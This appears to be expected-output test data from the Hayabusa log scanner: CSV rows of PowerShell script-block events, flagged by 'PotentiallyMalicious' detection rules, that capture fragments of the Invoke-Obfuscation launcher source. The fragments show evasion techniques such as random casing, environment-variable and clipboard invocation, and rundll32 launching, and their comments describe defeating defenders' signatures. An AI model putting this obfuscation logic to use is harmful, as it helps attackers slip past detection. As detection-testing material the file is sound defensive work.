([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # 